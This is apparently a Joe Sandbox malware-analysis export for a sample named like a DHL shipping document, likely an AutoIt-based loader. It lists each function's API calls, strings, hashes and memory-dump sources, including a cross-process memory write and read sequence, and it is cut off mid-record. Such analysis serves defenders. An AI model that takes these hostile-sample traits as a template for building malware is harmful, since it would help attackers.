                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: fc165b455a49cc3347dccf429817f4fc21ff4994b84b10eab39f7ead1050655c
                                                                                        • Instruction ID: 964cea3e99b71dd4217d7bc5efed8df4b1cd1d627c18a02ff7c04dc300782d66
                                                                                        • Opcode Fuzzy Hash: fc165b455a49cc3347dccf429817f4fc21ff4994b84b10eab39f7ead1050655c
                                                                                        • Instruction Fuzzy Hash: 8641A571A0021ABADF249AE5CC85FEFB7BDDF89710F000469FA04A71C1DA71AA04DB61
                                                                                        Function 00C7258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7259E
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C725D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: 92c069501446c113bde6b73f3703bbb0408d8f8b2e71e560954736fbd6d4071d
                                                                                        • Instruction ID: 287e8cc8900191708c17b1ae270d48622161d816f8f9ee6312cf3f05b8e315a0
                                                                                        • Opcode Fuzzy Hash: 92c069501446c113bde6b73f3703bbb0408d8f8b2e71e560954736fbd6d4071d
                                                                                        • Instruction Fuzzy Hash: 8D314871D00119ABCF15EFA5CC85EEEBFB8FF08340F10415AF918A6162EB315A56EB60
                                                                                        Function 00C87A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C87B61
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C87B76
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 59030e17e7620bc4eec9a0e243d324111db797d9ba1644f53c9d513d155e1d7d
                                                                                        • Instruction ID: 9aa7b0cf6e4d00965019a3cc9ee8228d5772cfc5c4ac00f18e4545181da95390
                                                                                        • Opcode Fuzzy Hash: 59030e17e7620bc4eec9a0e243d324111db797d9ba1644f53c9d513d155e1d7d
                                                                                        • Instruction Fuzzy Hash: F4412A74A042099FDB14DF65C980BEEBBB5FB08304F20026AE914EB391E770AA51DF94
                                                                                        Function 00C86A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00C86B17
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C86B53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: a095c4aeae79f1f8091aa419ec5435a0b0905ae1e00e61629ea9e6bf0e62daf3
                                                                                        • Instruction ID: 1c3433267bd352131550a5554eb64391fc86fe3f2904f0d12c5992eb75b56e70
                                                                                        • Opcode Fuzzy Hash: a095c4aeae79f1f8091aa419ec5435a0b0905ae1e00e61629ea9e6bf0e62daf3
                                                                                        • Instruction Fuzzy Hash: BD316D71200604AEDB10AF64CC81BFB77A9FF48768F108629F9A9D7190DB31AD91E764
                                                                                        Function 00C5994C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C59965
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C5999F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 63d7a47877fba214ad9ed3eef848a5c2a6cdaa31ca4f64b5d015d6a848097b56
                                                                                        • Instruction ID: 959a8f38f46e4bfc3954fe30305b402808c1878d7dbd214fba95b03ff4a36ac3
                                                                                        • Opcode Fuzzy Hash: 63d7a47877fba214ad9ed3eef848a5c2a6cdaa31ca4f64b5d015d6a848097b56
                                                                                        • Instruction Fuzzy Hash: D2210636D00215EBCF14EBA8C881DBEB779EF88711F1041ADFD15A7290EA31AD86D764
                                                                                        Function 00C628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62911
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C6294C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 381be61a803a9ef107e051b49b75639ec976205ef8dd37a24f6032b57624c612
                                                                                        • Instruction ID: cd65b664cab245a4c9d65a39a286f79f127bed1083998f463691c34ebb795450
                                                                                        • Opcode Fuzzy Hash: 381be61a803a9ef107e051b49b75639ec976205ef8dd37a24f6032b57624c612
                                                                                        • Instruction Fuzzy Hash: E031E431A00705AFEB34DF58DCC5BAEBBF8EF85350F180029E995A61A1DB709A40DB51
                                                                                        Function 00C739E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __snwprintf.LIBCMT ref: 00C73A66
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf_memmove
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 3506404897-2584243854
                                                                                        • Opcode ID: 71ac612fcebdc21d5282944234e07139027be40717a2f05506cb2f10c3452106
                                                                                        • Instruction ID: 55294ba3f8adeab2a296f100a8efddb9c9ac452d41302fef1e0ecb4189e90b43
                                                                                        • Opcode Fuzzy Hash: 71ac612fcebdc21d5282944234e07139027be40717a2f05506cb2f10c3452106
                                                                                        • Instruction Fuzzy Hash: 40219171A00219AFCF14EFA4CC82AAE77B9AF44710F404464F859A71C1DB30EA46EB65
                                                                                        Function 00C5A9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C1603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C16051
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5AA10
                                                                                        • _strlen.LIBCMT ref: 00C5AA1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2777139624-2594219639
                                                                                        • Opcode ID: 72fbd64ca358f2d3c4033e37d9eee6904c25ffd9ce2a4ff4d90a9ecd0707bf01
                                                                                        • Instruction ID: 641f105b80484ff7c943839bcb53d2f30f7747680c98ae1c617ce3d42c1c30e8
                                                                                        • Opcode Fuzzy Hash: 72fbd64ca358f2d3c4033e37d9eee6904c25ffd9ce2a4ff4d90a9ecd0707bf01
                                                                                        • Instruction Fuzzy Hash: 2E115B366001056BCF146E7ADDC29BE7B688F09301F10012EFD06CB193DD2499CAFA69
                                                                                        Function 00C86865 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C655FD: GetLocalTime.KERNEL32 ref: 00C6560A
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C6563F
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C65671
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C656A4
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C656E6
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C868FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalMessageSendTime
                                                                                        • String ID: @U=u$SysDateTimePick32
                                                                                        • API String ID: 2466184910-2530228043
                                                                                        • Opcode ID: 667b88d5092d27dfea66021954ee36829b4f1152f82938e1141c5c869cd5ad85
                                                                                        • Instruction ID: b50df300bfe0f18fcdfe810504e03b9b1fc8b0933a1630497bc61bda8d0acb62
                                                                                        • Opcode Fuzzy Hash: 667b88d5092d27dfea66021954ee36829b4f1152f82938e1141c5c869cd5ad85
                                                                                        • Instruction Fuzzy Hash: A82129713402186FEF21AE14DC82FEE736AEB44754F200529FD54AB1D0D6B1AD809764
                                                                                        Function 00C59225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5923E
                                                                                          • Part of subcall function 00C613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C61409
                                                                                          • Part of subcall function 00C613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C61419
                                                                                          • Part of subcall function 00C613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C6142F
                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00C592A5
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1045663743-2594219639
                                                                                        • Opcode ID: 57794de4b797662c4843bb4ca47fb1f3d90cf62d956b4fc57bf1a94955fcc106
                                                                                        • Instruction ID: 4cf3182794c92afebe629f262430ae1d212e0c4c2c8aae23b47b790f5801df79
                                                                                        • Opcode Fuzzy Hash: 57794de4b797662c4843bb4ca47fb1f3d90cf62d956b4fc57bf1a94955fcc106
                                                                                        • Instruction Fuzzy Hash: 2E216035901128FBDF21DBA4DC81FDDBBB8FF09311F1001A5F959A71A0EA705A85DB94
                                                                                        Function 00C866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C86761
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C8676C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 25e054b74f7d4157f418a4034eebab5cfecc3696a1407db2b1012d7aa09a6b23
                                                                                        • Instruction ID: c4afef510e774f56ee295dd002993a2928de43418a162278f904558cd757aa93
                                                                                        • Opcode Fuzzy Hash: 25e054b74f7d4157f418a4034eebab5cfecc3696a1407db2b1012d7aa09a6b23
                                                                                        • Instruction Fuzzy Hash: C5118275210208AFEF11AF54DC81FAB376AEB4836CF104129F92497290D6719D5197A4
                                                                                        Function 00C896F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 0-2594219639
                                                                                        • Opcode ID: 6a4844d9e684655e7fa52e46bf7bf97a5d12fb21c3ade5df3800591aac502743
                                                                                        • Instruction ID: 18b73c59a759506fdcfd7b941b819da43e3e0f92e0a8809bb884247431062031
                                                                                        • Opcode Fuzzy Hash: 6a4844d9e684655e7fa52e46bf7bf97a5d12fb21c3ade5df3800591aac502743
                                                                                        • Instruction Fuzzy Hash: 8A218135124118BFEF10AF54CC45FBA77E4EB09318F584165FA22DA1E0D671EA50DB68
                                                                                        Function 00C86C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C86C71
                                                                                        • GetSysColor.USER32(00000012), ref: 00C86C8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: 8cd0989abb25e513e48b0c66724d54ac729f08e1a5c21de4736609ea5b1f15b0
                                                                                        • Instruction ID: e6299ea4088bbbd3eadf60aefc0345d7870e2f51982c6cd7df6e104258b9d4a9
                                                                                        • Opcode Fuzzy Hash: 8cd0989abb25e513e48b0c66724d54ac729f08e1a5c21de4736609ea5b1f15b0
                                                                                        • Instruction Fuzzy Hash: 572129B2610209AFDF04EFA8CC45EEE7BA8FB08319F004629FD95D2250D635E851DB64
                                                                                        Function 00C629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62A22
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C62A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 41914b95247ec920101f4916205e2f871adfabe48834f76df8b88a4d02a44b03
                                                                                        • Instruction ID: 081148bc916050f9b10394aabad09fd0a3f981a45272eded9c25255d346b1ed0
                                                                                        • Opcode Fuzzy Hash: 41914b95247ec920101f4916205e2f871adfabe48834f76df8b88a4d02a44b03
                                                                                        • Instruction Fuzzy Hash: 05119072901914ABDB30DFD8D884BEEB7A8AB45314F144025E8A5F7291D7B0AE0AE791
                                                                                        Function 00C721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C7222C
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C72255
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 1b5aa11d147e49bff330d945a80cceb1dd3bb50607feb5f03e7827d4a729cc9e
                                                                                        • Instruction ID: e84396d26a00e689aab24f554fb9befa1985acdd49951995de839d35dc9eda51
                                                                                        • Opcode Fuzzy Hash: 1b5aa11d147e49bff330d945a80cceb1dd3bb50607feb5f03e7827d4a729cc9e
                                                                                        • Instruction Fuzzy Hash: D111C270541225BADB258F52CC84FFBFBACFF1A761F10C22AF92986101D6709A95D6F0
                                                                                        Function 00C884E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 00C88530
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 564170adba64cf5d931e55d745289b2f8885ad25336e235e56e3244b7f9cb5ad
                                                                                        • Instruction ID: 8169b85c3425e54a37c3fa5b3533b7f4e3bc85b12165bc8711e607fe12fd356c
                                                                                        • Opcode Fuzzy Hash: 564170adba64cf5d931e55d745289b2f8885ad25336e235e56e3244b7f9cb5ad
